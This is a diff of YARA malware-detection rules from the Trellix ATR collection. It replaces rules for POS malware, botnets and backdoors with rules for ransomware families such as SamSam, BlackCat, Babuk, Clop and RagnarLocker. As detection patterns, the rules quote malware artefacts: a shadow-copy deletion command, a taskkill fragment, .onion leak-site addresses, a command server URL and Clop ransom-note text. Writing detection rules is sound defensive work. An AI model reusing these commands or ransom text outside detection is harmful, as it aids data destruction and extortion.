+		id = "1c7985d0-d01c-52f7-8819-e038ccc01212"
+		date = "2018-01-25"
 		modified = "2020-08-14"
-		reference = "https://en.wikipedia.org/wiki/BlackPOS_Malware"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_blackpos_pdb.yar#L1-L25"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_SamSam.yar#L3-L52"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5a963e8aca62f3cf5872c6bff02d6dee0399728554c6ac3f5cb312b2ba7d7dbf"
-		logic_hash = "d8f3fa380ca15f0fae432849b8c16cb8a0a9d1427d3e72fbf89cbbd63b0849c9"
+		logic_hash = "9e8034ec0ded82ad82b625d6d1b9918761decef0fd42a253722cdc620b355e1a"
 		score = 75
-		quality = 70
-		tags = "POS, FILE"
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "pos"
-		malware_family = "Pos:W32/BlackPos"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/SamSam"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "45e00fe90c8aa8578fce2b305840e368d62578c77e352974da6b8f8bc895d75b"
 
 	strings:
-		$pdb = "\\Projects\\Rescator\\MmonNew\\Debug\\mmon.pdb"
+		$x1 = "Could not list processes locking resource. Failed to get size of result." fullword wide
+		$s2 = "Could not list processes locking resource." fullword wide
+		$s3 = "samsam.del.exe" fullword ascii
+		$s4 = "samsam.exe" fullword wide
+		$s5 = "RM_UNIQUE_PROCESS" fullword ascii
+		$s6 = "KillProcessWithWait" fullword ascii
+		$s7 = "killOpenedProcessTree" fullword ascii
+		$s8 = "RM_PROCESS_INFO" fullword ascii
+		$s9 = "Exception caught in process: {0}" fullword wide
+		$s10 = "Could not begin restart session.  Unable to determine file locker." fullword wide
+		$s11 = "samsam.Properties.Resources.resources" fullword ascii
+		$s12 = "EncryptStringToBytes" fullword ascii
+		$s13 = "recursivegetfiles" fullword ascii
+		$s14 = "RSAEncryptBytes" fullword ascii
+		$s15 = "encryptFile" fullword ascii
+		$s16 = "samsam.Properties.Resources" fullword wide
+		$s17 = "TSSessionId" fullword ascii
+		$s18 = "Could not register resource." fullword wide
+		$s19 = "<recursivegetfiles>b__0" fullword ascii
+		$s20 = "create_from_resource" fullword ascii
+		$op0 = { 96 00 e0 00 29 00 0b 00 34 23 }
+		$op1 = { 96 00 12 04 f9 00 34 00 6c 2c }
+		$op2 = { 72 a5 0a 00 70 a2 06 20 94 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_MALW_Fritzfrog : BOTNET FILE
+
+rule TRELLIX_ARC_Samsam_Ransomware_Latest : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Fritzfrog"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "4c553279-7e0c-5602-944d-ad8a47edf4ea"
-		date = "2020-08-20"
-		modified = "2020-08-20"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_fritzfrog.yar#L1-L26"
+		description = "Latest SamSA ransomware samples"
+		author = "Christiaan Beek"
+		id = "716b9282-013e-5194-8518-2fa1a4007095"
+		date = "2018-01-23"
+		modified = "2020-08-14"
+		reference = "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_SamSam.yar#L54-L105"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "488c807ecf0a9e981b2c1f2f5bb2e3072952d11f7cbf3a354bc85dc8e88b8b09"
-		score = 75
-		quality = 70
-		tags = "BOTNET, FILE"
+		hash = "88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828"
+		logic_hash = "06703479795fdef64813471f11b275df544c90d5bcece4817d415cd504d7b317"
+		score = 50
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "botnet"
-		malware_family = "Botnet:W32/Fritzfrog"
-		actor_type = "Cybercrime"
-		hash1 = "103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/SamSam"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern = { 7F454C4602010100000000000000000002003E000100000090D34500000000004000000000000000C8010000000000000000000040003800070040000D000300060000000400000040000000000000004000400000000000400040000000000088010000000000008801000000000000001000000000000004000000040000009C0F0000000000009C0F4000000000009C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000083F23E000000000083F23E00000000000010000000000000010000000400000000003F000000000000007F000000000000007F00000000006C834500000000006C834500000000000010000000000000010000000600000000908400000000000090C400000000000090C4000000000060EC0400000000005809070000000000001000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000006000000000000000010400000000000001000000000000083E23E00000000000000000000000000100000000000000000000000000000004100000001000000020000000000000000007F000000000000003F0000000000C0271B0000000000000000000000000020000000000000000000000000000000720000000300000000000000000000000000000000000000C0275A00000000007C000000000000000000000000000000010000000000000000000000000000004900000001000000020000000000000040289A000000000040285A0000000000D83600000000000000000000000000002000000000000000000000000000000053000000010000000200000000000000185F9A0000000000185F5A0000000000380D0000000000000000000000000000080000000000000000000000000000005D000000010000000200000000000000506C9A0000000000506C5A0000000000000000000000000000000000000000000100000000000000000000000000000067000000010000000200000000000000606C9A0000000000606C5A00000000000C172A0000000000000000000000000020000000000000000000000000000000070000000100000003000000000000000090C400000000000090840000000000004B0300000000000000000000000000200000000000000000000000000000001200000001000000030000000000000000DBC7000000000000DB87000000000050A101000000000000000000000000002000000000000000000000000000000018000000080000000300000000000000607CC90000000000607C890000000000D0E80100000000000000000000000000200000000000000000000000000000001D0000000800000003000000000000004065CB000000000040658B00000000001834000000000000000000000000000020000000000000000000000000000000270000000700000002000000000000009C0F4000000000009C0F00000000000064000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 }
+		$s1 = "bedf08175d319a2f879fe720032d11e5" fullword wide
+		$s2 = "ksdghksdghkddgdfgdfgfd" fullword ascii
+		$s3 = "osieyrgvbsgnhkflkstesadfakdhaksjfgyjqqwgjrwgehjgfdjgdffg" fullword ascii
+		$s4 = "5c2d376c976669efaf9cb107f5a83d0c" fullword wide
+		$s5 = "B917754BCFE717EB4F7CE04A5B11A6351EEC5015" fullword ascii
+		$s6 = "f99e47c1d4ccb2b103f5f730f8eb598a" fullword wide
+		$s7 = "d2db284217a6e5596913e2e1a5b2672f" fullword wide
+		$s8 = "0bddb8acd38f6da118f47243af48d8af" fullword wide
+		$s9 = "f73623dcb4f62b0e5b9b4d83e1ee4323" fullword wide
+		$s10 = "916ab48e32e904b8e1b87b7e3ced6d55" fullword wide
+		$s11 = "c6e61622dc51e17195e4df6e359218a2" fullword wide
+		$s12 = "2a9e8d549af13031f6bf7807242ce27f" fullword wide
+		$s13 = "e3208957ad76d2f2e249276410744b29" fullword wide
+		$s14 = "b4d28bbd65da97431f494dd7741bee70" fullword wide
+		$s15 = "81ee346489c272f456f2b17d96365c34" fullword wide
+		$s16 = "94682debc6f156b7e90e0d6dc772734d" fullword wide
+		$s17 = "6943e17a989f11af750ea0441a713b89" fullword wide
+		$s18 = "b1c7e24b315ff9c73a9a89afac5286be" fullword wide
+		$s19 = "90928fd1250435589cc0150849bc0cff" fullword wide
+		$s20 = "67da807268764a7badc4904df351932e" fullword wide
+		$op0 = { 30 01 00 2b 68 79 33 38 68 34 77 65 36 34 74 72 }
+		$op1 = { 01 00 b2 04 00 00 01 00 84 }
+		$op2 = { 68 09 00 00 38 66 00 00 23 55 53 00 a0 6f 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 26000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 8 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Malw_Likseput_Backdoor_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Ransom_Win_Blackcat : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Likseput backdoor based on the PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "2193daf8-016b-5f49-97ec-b821c8da22f6"
-		date = "2011-03-26"
-		modified = "2020-08-14"
-		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_likseput.e"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_likseput_backdoor_pdb.yar#L1-L25"
+		description = "Detecting variants of Windows BlackCat malware"
+		author = " Trellix ATR"
+		id = "65483ffb-6b10-5fd5-8a5f-fc885a5f2e98"
+		date = "2022-01-06"
+		modified = "2022-01-19"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Win_BlackCat_public.yar#L2-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "993b36370854587f4eef3366562f01ab87bc4f7b88a21f07b44bd5051340386d"
-		logic_hash = "2afc4b7e6a5f0d9fed9a075aebaac8157e843c83c55c3f2255431bb6a03459ec"
+		logic_hash = "8faad28ab26690221f6e2130c886446615dbd505f76490cfaf999d130d0de6e3"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Likseput"
-		actor_type = "Cybercrime"
+		tags = "RANSOMWARE, FILE"
+		malware_type = "Ransomware"
+		detection_name = "Ransom_Win_BlackCat"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\work\\code\\2008-7-8muma\\mywork\\winInet_winApplication2009-8-7\\mywork\\aaaaaaa\\Release\\aaaaaaa.pdb"
+		$URL1 = "zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide
+		$URL2 = "mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide
+		$API = { 3a 7c d8 3f }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 3500KB and 1 of ( $URL* ) and $API
 }
-rule TRELLIX_ARC_Malw_Medfos : TROJAN FILE
+rule TRELLIX_ARC_Ransom_Babuk : RANSOM T1027 T1083 T1057 T1082 T1129 T1490 T1543_003 FILE
 {
 	meta:
-		description = "Rule to detect Medfos trojan based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "07ad0227-ca8f-5071-8ef7-8c3e087fcc35"
-		date = "2013-04-19"
-		modified = "2020-08-14"
-		reference = "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=win32%2Fmedfos"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_medfos_pdb.yar#L1-L25"
+		description = "Rule to detect Babuk Locker"
+		author = "TS @ McAfee ATR"
+		id = "7c0a3b4e-90aa-5442-aa5e-1a7fcae9bec8"
+		date = "2021-01-19"
+		modified = "2021-02-24"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BabukLocker_Jan2021.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "3582e242f62598445ca297c389cae532613afccf48b16e9c1dcf1bfedaa6e14f"
-		logic_hash = "1726462a806f5cb3f0b80596623cebc51a7a9f866ded0cb59ea1c43034ce2819"
+		hash = "e10713a4a5f635767dcd54d609bed977"
+		logic_hash = "123cebd1c2e66f3e91ee235cb9288df63dfaeba02e6df45f896cb50f38851a8f"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "RANSOM, T1027, T1083, T1057, T1082, T1129, T1490, T1543.003, FILE"
+		rule_version = "v2"
+		malware_family = "Ransom:Win/Babuk"
+		malware_type = "Ransom"
+		mitre_attack = "T1027, T1083, T1057, T1082, T1129, T1490, T1543.003"
+
+	strings:
+		$s1 = {005C0048006F007700200054006F00200052006500730074006F0072006500200059006F00750072002000460069006C00650073002E007400780074}
+		$s2 = "delete shadows /all /quiet" fullword wide
+		$pattern1 = {006D656D74617300006D65706F63730000736F70686F730000766565616D0000006261636B7570000047785673730000004778426C7200000047784657440000004778435644000000477843494D67720044656657617463680000000063634576744D67720000000063635365744D677200000000536176526F616D005254567363616E0051424643536572766963650051424944505365727669636500000000496E747569742E517569636B426F6F6B732E46435300}
+		$pattern2 = {004163725363683253766300004163726F6E69734167656E74000000004341534144324457656253766300000043414152435570646174655376630000730071}
+		$pattern3 = {FFB0154000C78584FDFFFFB8154000C78588FDFFFFC0154000C7858CFDFFFFC8154000C78590FDFFFFD0154000C78594FDFFFFD8154000C78598FDFFFFE0154000C7859CFDFFFFE8154000C785A0FDFFFFF0154000C785A4FDFFFFF8154000C785A8FDFFFF00164000C785ACFDFFFF08164000C785B0FDFFFF10164000C785B4FDFFFF18164000C785B8FDFFFF20164000C785BCFDFFFF28164000C785C0FDFFFF30164000C785C4FDFFFF38164000C785C8FDFFFF40164000C785CCFDFFFF48164000C785D0FDFFFF50164000C785D4FDFFFF581640}
+		$pattern4 = {400010104000181040002010400028104000301040003810400040104000481040005010400058104000601040006C10400078104000841040008C10400094104000A0104000B0104000C8104000DC104000E8104000F01040000011400008114000181140002411400038114000501140005C11400064114000741140008C114000A8114000C0114000E0114000F4114000101240002812400034124000441240005412400064124000741240008C124000A0124000B8124000D4124000EC1240000C1340002813400054134000741340008C134000A4134000C4134000E8134000FC134000141440003C144000501440006C144000881440009C144000B4144000CC144000E8144000FC144000141540003415400048154000601540007815}
+
+	condition:
+		filesize >= 15KB and filesize <= 90KB and 1 of ( $s* ) and 3 of ( $pattern* )
+}
+rule TRELLIX_ARC_Shrug2_Ransomware : RANSOMWARE FILE
+{
+	meta:
+		description = "Rule to detect the Shrug Ransomware"
+		author = "McAfee ATR Team"
+		id = "34e59296-db7c-551b-8d48-ffea20f2b4bb"
+		date = "2018-07-12"
+		modified = "2020-10-12"
+		reference = "https://blogs.quickheal.com/new-net-ransomware-shrug2/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_shrug2.yar#L1-L30"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "c89833833885bafdcfa1c6ee84d7dbcf2389b85d7282a6d5747da22138bd5c59"
+		logic_hash = "8c817b7fc4a0eada08b3d298c94b99a85c4e5a49a49d1c3fabdb0c6bbf56676b"
+		score = 75
+		quality = 20
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Medfos"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Shrug"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\som\\bytguqne\\jzexsaf\\gyin.pdb"
+		$s1 = "C:\\Users\\Gamer\\Desktop\\Shrug2\\ShrugTwo\\ShrugTwo\\obj\\Debug\\ShrugTwo.pdb" fullword ascii
+		$s2 = "http://tempacc11vl.000webhostapp.com/" fullword wide
+		$s3 = "Shortcut for @ShrugDecryptor@.exe" fullword wide
+		$s4 = "C:\\Users\\" fullword wide
+		$s5 = "http://clients3.google.com/generate_204" fullword wide
+		$s6 = "\\Desktop\\@ShrugDecryptor@.lnk" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
 }
-rule TRELLIX_ARC_Kelihos_Botnet_Pdb : BOTNET FILE
+rule TRELLIX_ARC_Clop_Ransom_Note : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Kelihos malware based on PDB"
+		description = "Rule to detect Clop Ransomware Note"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "2b6683a1-ba19-586b-8a92-89d4764efa12"
-		date = "2013-09-04"
+		id = "b18e4d4d-aa38-5009-a31b-ed038c5bd4f9"
+		date = "2019-08-01"
 		modified = "2020-08-14"
-		reference = "https://www.malwaretech.com/2017/04/the-kelihos-botnet.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_kelhios_botnet_pdb.yar#L1-L26"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_ClopRansomNote.yar#L1-L34"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "f0a6d09b5f6dbe93a4cf02e120a846073da2afb09604b7c9c12b2e162dfe7090"
-		logic_hash = "f60fb85161f86653f390b444d568da24cf07b3be99856230156741e8451e2a3f"
+		logic_hash = "a90862e9dc59b1a8f38b777b4f529d5de740d0f49175813cae64f10ca9677826"
 		score = 75
 		quality = 70
-		tags = "BOTNET, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "botnet"
-		malware_family = "Botnet:W32/Kelihos"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Clop"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Only\\Must\\Not\\And.pdb"
-		$pdb1 = "\\To\\Access\\Do.pdb"
+		$s1 = "If you want to restore your files write to emails" fullword ascii
+		$s2 = "All files on each host in the network have been encrypted with a strong algorithm." fullword ascii
+		$s3 = "Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover." fullword ascii
+		$s4 = "You will receive decrypted samples and our conditions how to get the decoder." fullword ascii
+		$s5 = "DO NOT RENAME OR MOVE the encrypted and readme files." fullword ascii
+		$s6 = "(Less than 6 Mb each, non-archived and your files should not contain valuable information" fullword ascii
+		$s7 = "We exclusively have decryption software for your situation" fullword ascii
+		$s8 = "Do not rename encrypted files." fullword ascii
+		$s9 = "DO NOT DELETE readme files." fullword ascii
+		$s10 = "Nothing personal just business" fullword ascii
+		$s11 = "eqaltech.su" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1440KB and any of them
+		( uint16( 0 ) == 0x6f59 ) and filesize < 10KB and all of them
 }
-rule TRELLIX_ARC_MALW_Liquorbot : MALWARE FILE
+rule TRELLIX_ARC_Pico_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect LiquorBot malware"
+		description = "Rule to detect Pico Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "73898df8-b5eb-50ac-a2fe-ef9233c251c5"
-		date = "2020-08-19"
-		modified = "2020-08-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_liquorbot.yar#L1-L23"
+		id = "843cac7a-652e-5cbf-a09d-fb4b1eaa8481"
+		date = "2018-08-30"
+		modified = "2020-08-14"
+		reference = "https://twitter.com/siri_urz/status/1035138577934557184"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Pico.yar#L1-L37"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "2448e3ede809331b2370fe9d42d603ad6508be6531a1a8764e0e0621867b6e89"
+		hash = "cc4a9e410d38a29d0b6c19e79223b270e3a1c326b79c03bec73840b37778bc06"
+		logic_hash = "bb15e66504f393bcb4b173cb2a4ec65aa13110060f7fb70282330b5f6d72f5ed"
 		score = 75
-		quality = 70
-		tags = "MALWARE, FILE"
+		quality = 20
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "malware"
-		malware_family = "Botnet:W32/LiquorBot"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Pico"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "5b2a9cbda99ed903f75c3b37f0a6b1b9f6c39671a76ed652f3ddba117fd43bc9"
 
 	strings:
-		$pattern = { 7F454C4602010100000000000000000002003E0001000000605A4600000000004000000000000000700200000000000000000000400038000A0040001B00090006000000040000004000000000000000400040000000000040004000000000003002000000000000300200000000000000100000000000000300000004000000E00F000000000000E00F400000000000E00F40000000000020000000000000002000000000000000010000000000000004000000040000007C0F0000000000007C0F4000000000007C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000040FB29000000000040FB2900000000000010000000000000010000000400000000002A000000000000006A000000000000006A0000000000E4492C0000000000E4492C000000000000100000000000000100000006000000005056000000000000509600000000000050960000000000E014040000000000681307000000000000100000000000000200000006000000405156000000000040519600000000004051960000000000300100000000000030010000000000000800000000000000070000000400000000000000000000000000000000000000000000000000000000000000000000000800000000000000080000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A00000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010000000600000000000000001040000000000000100000000000001FE9290000000000000000000000000010000000000000000000000000000000F000000001000000060000000000000020F969000000000020F929000000000020020000000000000000000000000000100000000000000010000000000000007000000001000000020000000000000000006A000000000000002A0000000000A678110000000000000000000000000020000000000000000000000000000000E0000000040000000200000000000000A8787B0000000000A8783B000000000018000000000000000B0000000000000008000000000000001800000000000000E6000000040000000200000000000000C0787B0000000000C0783B000000000018030000000000000B0000000200000008000000000000001800000000000000F5000000FF }
+		$s1 = "C:\\Users\\rikfe\\Desktop\\Ransomware\\ThanatosSource\\Release\\Ransomware.pdb" fullword ascii
+		$s2 = "\\Downloads\\README.txt" fullword ascii
+		$s3 = "\\Music\\README.txt" fullword ascii
+		$s4 = "\\Videos\\README.txt" fullword ascii
+		$s5 = "\\Pictures\\README.txt" fullword ascii
+		$s6 = "\\Desktop\\README.txt" fullword ascii
+		$s7 = "\\Documents\\README.txt" fullword ascii
+		$s8 = "/c taskkill /im " fullword ascii
+		$s9 = "\\AppData\\Roaming\\" fullword ascii
+		$s10 = "gMozilla/5.0 (Windows NT 6.1) Thanatos/1.1" fullword wide
+		$s11 = "AppData\\Roaming" fullword ascii
+		$s12 = "\\Downloads" fullword ascii
+		$s13 = "operator co_await" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB ) and all of them
 }
-rule TRELLIX_ARC_Redline_Payload : BACKDOOR FILE
+
+rule TRELLIX_ARC_Ragnarlocker_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the RedLine payload"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "61c2032f-1e6b-5123-8f99-ff83ae95e8a9"
-		date = "2020-04-16"
-		modified = "2020-08-14"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_redline.yar#L1-L38"
+		description = "Rule to detect RagnarLocker samples"
+		author = "McAfee ATR Team"
+		id = "58874f27-3070-52c9-bd96-337fdaa4499b"
+		date = "2020-04-15"
+		modified = "2020-10-12"
+		reference = "https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-targets-msp-enterprise-support-tools/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_ragnarlocker.yar#L3-L45"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5df956f08d6ad0559efcdb7b7a59b2f3b95dee9e2aa6b76602c46e2aba855eff"
-		logic_hash = "44df161b7434b9137ca5bb919eb314f8447b216b3f6e1214606a898fb36ee4f4"
+		hash = "9706a97ffa43a0258571def8912dc2b8bf1ee207676052ad1b9c16ca9953fc2c"
+		logic_hash = "2f31da9182a1b47fb1e7e4459461de4c496ec323ff13e622d3ce27ac8cce1912"
 		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/RedLine"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/RagnarLocker"
 		actor_type = "Cybercrime"
